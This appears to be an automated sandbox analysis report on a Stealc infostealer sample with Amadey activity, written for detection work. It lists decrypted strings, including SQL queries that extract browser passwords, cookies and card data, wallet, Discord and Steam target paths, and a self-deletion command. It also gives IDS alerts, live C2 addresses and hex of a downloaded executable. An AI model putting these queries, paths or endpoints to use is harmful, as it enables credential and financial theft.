Source: 0.2.file.exe.520000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.520000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.520000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.520000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.520000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.520000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.520000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.520000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.520000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.520000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.520000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.520000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.520000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.520000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.520000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.520000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.520000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.520000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.520000.0.unpack	String decryptor: history
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.520000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.520000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.520000.0.unpack	String decryptor: History
Source: 0.2.file.exe.520000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.520000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.520000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.520000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.520000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.520000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.520000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.520000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.520000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.520000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.520000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.520000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.520000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.520000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.520000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.520000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.520000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.520000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.520000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.520000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.520000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.520000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.520000.0.unpack	String decryptor: open
Source: 0.2.file.exe.520000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.520000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.520000.0.unpack	String decryptor: files
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.520000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.520000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.520000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.520000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.520000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.520000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.520000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.520000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.520000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.520000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.520000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.520000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: done
Source: 0.2.file.exe.520000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.520000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.520000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.520000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.520000.0.unpack	String decryptor: https
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.520000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.520000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.520000.0.unpack	String decryptor: build
Source: 0.2.file.exe.520000.0.unpack	String decryptor: token
Source: 0.2.file.exe.520000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.520000.0.unpack	String decryptor: file
Source: 0.2.file.exe.520000.0.unpack	String decryptor: message
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.520000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C966C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C966C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CABA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB44C0 PK11_PubEncrypt,	0_2_6CAB44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CA84420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAB4440 PK11_PrivDecrypt,	0_2_6CAB4440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CB025B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CA9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA98670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CA98670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CABA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CABA650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CADA730
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CAE0180

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 40.126.53.13:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.17:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.33:443 -> 192.168.2.6:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49996 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2756959532.000000006CB8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 17MB later: 36MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49713 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49713 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49713 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49713
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49713 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50004 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50010
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50014 -> 185.215.113.43:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Yara detected Generic Downloader

Source: Yara match	File source: 24.0.JoYUT4N.exe.9c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe, type: DROPPED

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 09:51:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 